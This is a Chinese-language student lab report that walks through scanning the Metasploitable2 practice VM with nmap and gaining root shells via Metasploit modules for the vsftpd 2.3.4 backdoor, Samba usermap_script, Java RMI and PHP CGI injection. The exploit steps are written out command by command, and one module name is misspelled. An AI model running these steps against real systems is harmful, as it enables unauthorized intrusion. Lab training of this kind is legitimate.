1.實驗內容
經過高強度的攻擊滲透操作,我現在已經熟練的掌握了Metasploit工具的用法,也深刻體會到漏洞的可怕之處,這些漏洞會嚴重威脅到我們的隱私安全。
2.實驗過程
(1)前期滲透
①主機發現
輸入命令msfconsole
進入控制檯
再search arp_sweep
搜尋一下
成功找到
輸入use 0
使用auxiliary/scanner/discovery/arp_sweep
先ifconfig看一下靶機的ip地址
可以看到靶機的ip地址是192.168.50.175
這時我們set RHOSTS 192.168.50.175
設定目標ip地址
然後exploit
圖中可以看出成功發現主機192.168.50.175
②埠掃描
輸入命令nmap -sT 192.168.50.175
進行掃描
掃描結果如圖
③掃描系統和漏洞
輸入nmap -sV 192.168.50.175
檢視服務版本資訊
輸入nmap -O 192.168.50.175
檢視作業系統資訊
輸入nmap --script=vuln 192.168.50.175
進行漏洞掃描
(2)Vsftpd原始碼包後門漏洞(21埠)
漏洞簡介:Vsftpd(Very Secure FTP Daemon)2.3.4版本的原始碼包被植入了惡意後門程式碼。這個漏洞的觸發點是Vsftpd在接受使用者名稱時,如果使用者名稱包含特定字串:)
,就會觸發後門機制。
先nmap -sV -p 21 192.168.50.175
掃描一下目標埠的資訊
可以看到21埠是開啟的,而且vsftpd的版本是2.3.4,即存在漏洞的版本
接下來輸入msfconsole
啟動控制檯
search vsftpd
搜尋相關漏洞
use 1
使用exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.50.175
設定目標ip地址
exploit
開始攻擊
輸入uname -a、pwd、id、whoami、ifconfig
等命令都可以成功執行並輸出資訊,可以證明攻擊成功
(3)SambaMS-RPC Shell命令注入漏洞(埠139)
漏洞簡介:Samba MS-RPC Shell命令注入漏洞(CVE-2007-2447)是Samba服務中的一個漏洞。攻擊者透過埠139向遠端Samba服務傳送特製請求,可利用漏洞注入命令並以root許可權執行,危害嚴重。
輸入msfconsole
啟動控制檯
search samba
搜尋相關漏洞
use exploit/multi/samba/usermap_script
選擇要使用的漏洞
set RHOSTS 192.168.50.175
設定目標ip地址
exploit
開始攻擊
輸入uname -a、pwd、id、whoami、ifconfig
等命令都可以成功執行並輸出資訊,可以證明攻擊成功
(4)Java RMI SERVER命令執行漏洞(1099埠)
漏洞簡介:Java RMI Server命令執行漏洞(CVE-2011-3556)允許攻擊者透過1099埠向RMI註冊服務傳送惡意序列化物件,觸發遠端程式碼執行,導致目標系統被完全控制,危害嚴重。
先nmap -sV -p 1099 192.168.50.175
掃描一下目標埠的資訊
接下來輸入msfconsole
啟動控制檯
search rmi
搜尋相關漏洞
use exploit/multi/misc/java_rmi_server
選擇要使用的漏洞
set RHOSTS 192.168.50.175
設定目標ip地址
exploit
開始攻擊
進入了meterpreter後輸入sessions -i 1
和shell
這時輸入uname -a、pwd、id、whoami、ifconfig
等命令都可以成功執行並輸出資訊,可以證明攻擊成功
(5)PHP CGI引數執行注入漏洞(80埠)
漏洞簡介:PHP CGI引數執行注入漏洞(CVE-2012-1823)允許攻擊者透過80埠傳送特製請求,利用未正確處理的引數在PHP CGI模式下執行任意命令,導致伺服器被控制。
先nmap -sV -p 80 192.168.50.175
掃描一下目標埠的資訊
接下來輸入msfconsole
啟動控制檯
search php_cgi
搜尋相關漏洞
use 0
使用exploit/multi/http/php_cei_arg_injection
set RHOSTS 192.168.50.175
設定目標ip地址
exploit
開始攻擊
進入了meterpreter後輸入sessions -i 1
和shell
輸入uname -a、pwd、id、whoami
等命令都可以成功執行並輸出資訊,可以證明攻擊成功
3.問題及解決方案
問題1:靶機Metasploitable2的網路配置不正確,導致無法正常通訊。
問題1解決方案:將靶機網路模式設定為與攻擊機一致,確保二者的ip地址在同一網段。
4.學習感悟、思考等
在這次實驗中,我更加熟練的掌握瞭如何使用Metasploit進行滲透測試,瞭解到如何透過掃描埠和發現漏洞來攻擊目標系統。具體學習了幾個常見的漏洞利用方法,如Vsftpd後門漏洞、Samba命令注入漏洞、Java RMI執行漏洞和PHP CGI注入漏洞,並透過Metasploit成功地利用這些漏洞獲取目標主機的控制許可權。透過這些實踐,我深刻感受到漏洞利用不僅需要理論知識,更要有動手實踐的能力,只有不斷操作,才能真正理解攻擊背後的原理。